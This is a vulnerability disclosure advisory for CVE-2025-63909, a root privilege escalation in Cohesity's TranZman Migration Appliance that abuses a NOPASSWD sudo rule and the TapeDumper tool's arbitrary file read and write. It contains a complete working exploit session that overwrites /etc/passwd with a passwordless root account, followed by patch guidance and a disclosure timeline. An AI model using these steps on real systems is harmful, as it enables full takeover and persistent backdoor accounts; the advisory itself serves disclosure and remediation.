| Field | Value |
|---|---|
| CVE ID | CVE-2025-63909 |
| CVSS v3.1 | 7.2 (High) |
| Vector | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-269: Improper Privilege Management |
| Vendor | Cohesity, Inc. |
| Product | TranZman Migration Appliance |
| Affected Versions | Release 4.0 Build 14614 including patch TZM_1757588060_SEP2025_FULL.depot |
Incorrect access control in the component /opt/SRLtzm/bin/TapeDumper of
Cohesity TranZman Migration Appliance allows attackers to escalate
privileges to root and read and write arbitrary files.
The vulnerability exists due to:
- Overly permissive sudo configuration in
/etc/sudoers - Admin user has NOPASSWD access to
/opt/SRLtzm/bin/* - TapeDumper binary treats any file as a tape device, enabling arbitrary file read/write as root
Prerequisites: Shell access (typically obtained via CLISH command injection - CVE-2025-63911)
TapeDumper is an interactive CLI tool that accepts open and dump
commands. It treats arbitrary files as "tape devices", allowing
unrestricted read/write operations without validation.
Exploitation steps:
- Escape from CLISH using command injection vulnerability
- Create a writable staging file
- Launch TapeDumper with sudo, use
opento read/etc/passwdanddumpto write contents to the staging file - Append a passwordless root user to the staging file
- Launch TapeDumper again,
openthe staging file anddumpback to/etc/passwd - Switch to root via
su bob
Example session:
[admin@tzm ~]$ touch /tmp/staging
[admin@tzm ~]$ sudo /opt/SRLtzm/bin/TapeDumper
Stone Ram Tape Dumper (862)
open /etc/passwd
dump /tmp/staging
Dumped to '/tmp/staging', size 1859
^C
[admin@tzm ~]$ echo "bob::0:0::/root:/bin/bash" >> /tmp/staging
[admin@tzm ~]$ sudo /opt/SRLtzm/bin/TapeDumper
open /tmp/staging
dump /etc/passwd
Dumped to '/etc/passwd', size 1885
^C
[admin@tzm ~]$ su bob
[root@tzm ~]# id
uid=0(root) gid=0(root) groups=0(root)
- Root Access: Complete privilege escalation to root
- Arbitrary File Access: Read/write any file on the system
- Persistence: Create backdoor accounts
- Full System Compromise: Complete control of the TranZman appliance
Apply Cohesity patches in the following order:
TZM_patch_1.patchTZM_1760106063_OCT2025R2_FULL.depot
Contact Cohesity support for the latest OVA version with integrated fixes.
Note: While Cohesity's CLISH fix may reduce exposure by preventing initial shell access, the underlying sudo/TapeDumper vulnerability remains exploitable if alternative shell access is obtained.
| Date | Event |
|---|---|
| 26 September 2025 | Reported to Cohesity |
| 20 October 2025 | Cohesity confirmed fix in patches |
| 25 December 2025 | Embargo period ended |
| 27 December 2025 | Public disclosure |
Discovered by Greg Durys, LME